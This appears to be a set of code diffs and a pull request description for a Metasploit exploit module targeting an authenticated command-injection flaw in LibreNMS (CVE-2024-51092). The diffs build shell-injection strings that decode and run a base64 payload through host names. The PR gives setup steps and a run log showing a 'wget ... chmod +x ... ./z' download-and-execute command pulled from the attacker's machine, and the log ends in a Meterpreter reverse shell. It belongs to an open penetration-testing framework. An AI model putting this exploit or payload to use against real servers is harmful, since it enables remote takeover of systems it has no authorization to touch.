-      print_status("Command chunk size = #{chunk_size}")
-      cmd_chunks = cmd.chars.each_slice(chunk_size).map(&:join)
-      redirector = '>'
-      cmd_chunks.each_with_index do |chunk, index|
-        print_status("Staging chunk #{index + 1} of #{cmd_chunks.count}")
-        @hosts << ";echo -n #{chunk}#{redirector}#{staging_file};"
-        redirector = '>>'
-      end
-      @hosts << ";cat #{staging_file} | base64 -d |sh;"
-end
-
-
-      # cannot contain `/`
+    # because 128 - 20 = 108 where 20 is length of remaining characters in original payload
+    if Rex::Text.encode_base64(payload.encoded).length <= 108
+      @hosts = [";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"]
+      print_status("Adding host: '#{@hosts[0]}', length: #{@hosts[0].length}")
+    else
+      @hosts = []
       staging_file = Rex::Text.rand_text_alpha(1, datastore['FETCH_FILENAME'])
       register_file_for_cleanup(staging_file)
       cmd = Rex::Text.encode_base64(payload.encoded)
@@ -205,6 +187,7 @@ end
       end
       @hosts << ";cat #{staging_file} | base64 -d |sh;"
     end
+
     @device_ids = []
     @hosts.each do |host|
       res = send_request_cgi({

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -94,6 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     html_body = res&.get_html_document
     version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
     return Exploit::CheckCode::Unknown('Cannot find librenmsversion') if version_node.nil?
+
     version_node&.at('span')&.content = ''
     version = Rex::Version.new(version_node.text)
     return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('24.9.1')
@@ -140,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
       change_snmpget
     end
 
-    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless created
+    fail_with(Failure::Unknown, 'Failed to create malicious file. You may need more wait time, or the cron job might be disabled.') unless created
     register_file_for_cleanup(datastore['FETCH_FILENAME'])
     send_request_cgi({
       'method' => 'GET',
@@ -155,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to access addhost page.') unless res&.code == 200
     # The maximum host length is 128 characters.
-    @host = ";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;#"
+    @host = ";echo #{Rex::Text.encode_base64(payload.encoded)}|base64 -d|sh;"
     print_status("Try to add host: '#{@host}', length: #{@host.length}")
     fail_with(Failure::Unknown, 'Failed to limit the host length to 128 characters or less.') unless @host.length <= 128
     res = send_request_cgi({

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -80,14 +80,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to extract csrf token.') unless token
 
     login
-    return Exploit::CheckCode::Detected('LibreNMS detected. but login failed and version is unknown.') unless @cookies
+    return Exploit::CheckCode::Detected('LibreNMS detected. Login failed and version is unknown.') unless @cookies
 
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'about'),
       'cookie' => @cookies
     })
-    return Exploit::CheckCode::Detected('LibreNMS detected. but version is unknown.') unless res&.code == 200
+    return Exploit::CheckCode::Detected('LibreNMS detected. Version is unknown.') unless res&.code == 200
 
     html_body = res.get_html_document
     version_node = html_body.at("a[@href='https://www.librenms.org/changelog.html']")

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -140,6 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
       break if @hosts.all? { |h| change_snmpget(h) }
     end
 
+    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless @hosts.all? { |h| change_snmpget(h) }
     @hosts.each do |host|
       res = change_snmpget(host)
       fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -140,7 +140,10 @@ class MetasploitModule < Msf::Exploit::Remote
       break if @hosts.all? { |h| change_snmpget(h) }
     end
 
-    fail_with(Failure::Unknown, 'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.') unless @hosts.all? { |h| change_snmpget(h) }
+    fail_with(
+      Failure::Unknown,
+      'Failed to create malicious files. You may need more wait time, or the cron job might be disabled.'
+    ) unless @hosts.all? { |h| change_snmpget(h) }
     @hosts.each do |host|
       res = change_snmpget(host)
       fail_with(Failure::Unknown, 'Failed to update snmpget.') unless res

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -111,8 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, 'Failed to log into LibreNMS.') unless res&.code == 200 && res.body.include?('Devices')
 
-    print_status('Successfully logged into LibreNMS. Storing credentials...')
-    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    print_status('Successfully logged into LibreNMS.')
   end
 
   def exploit

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -66,8 +66,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_csrf_token(res)
     return res&.get_html_document&.at('meta[name="csrf-token"]') ? res.get_html_document.at('meta[name="csrf-token"]')['content'] : nil
-
-    res.get_html_document.at('meta[name="csrf-token"]')['content']
   end
 
   def check

--- a/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
+++ b/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
@@ -86,9 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return Exploit::CheckCode::Detected('LibreNMS detected. Version is unknown.') unless res&.code == 200
 
-    html_body = res.get_html_document
-    version_node = html_body.at("a[@href='https://www.librenms.org/changelog.html']")
-    version_node.at('span').content = ''
+    html_body = res&.get_html_document
+    version_node = html_body&.at("a[@href='https://www.librenms.org/changelog.html']")
+    version_node&.at('span')&.content = ''
     version = Rex::Version.new(version_node.text)
     return Exploit::CheckCode::Safe("LibreNMS version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('24.9.1')
 


### PR DESCRIPTION
closes https://github.com/rapid7/metasploit-framework/issues/19702

## Vulnerable Application

An authenticated attacker can create dangerous directory names on the system and alter sensitive configuration parameters through the web portal. Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls, thus achieving arbitrary code execution.

The vulnerability affects:

    * 24.9.0 <= LibreNMS <= 24.9.1

This module was successfully tested on:

    * LibreNMS 24.9.0 installed on Ubuntu 22.04
    * LibreNMS 24.9.1 installed on Ubuntu 22.04


### Installation

1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
After git clone, change version: `git checkout tags/24.9.1`.

2. Comment out the last line in `/etc/cron.d/librenms`:
`19 0 * * * librenms /opt/librenms/daily.sh >> /dev/null 2>&1`.
Otherwise, the version will be updated to the latest, causing the exploit to fail.


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092`
4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
5. (Optional) Do: `php artisan device:poll all` on the victim machine or wait up to 5 minutes (default cron setting)
6. You should get a meterpreter


## Scenarios
```
msf6 > use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Successfully logged into LibreNMS.
[+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
[*] Try to add host: '7;echo d2dldCAtcU8gLi96IGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC92O2NobW9kICt4IC4vejsuL3om|base64 -d|bash;#', length: 100
[*] Added host.
[*] Actual payload: wget -qO ./z http://192.168.56.1:8080/v;chmod +x ./z;./z&
[*] Waiting up to 315 seconds for cron to poll the device...
[*] Sending stage (3045380 bytes) to 192.168.56.17
[+] Deleted z
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:41362) at 2025-01-17 21:45:23 +0900
[*] Reset snmpget to default.
[*] Deleted device: 354

meterpreter > getuid
Server username: librenms
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           : Ubuntu 22.04 (Linux 6.8.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >  
```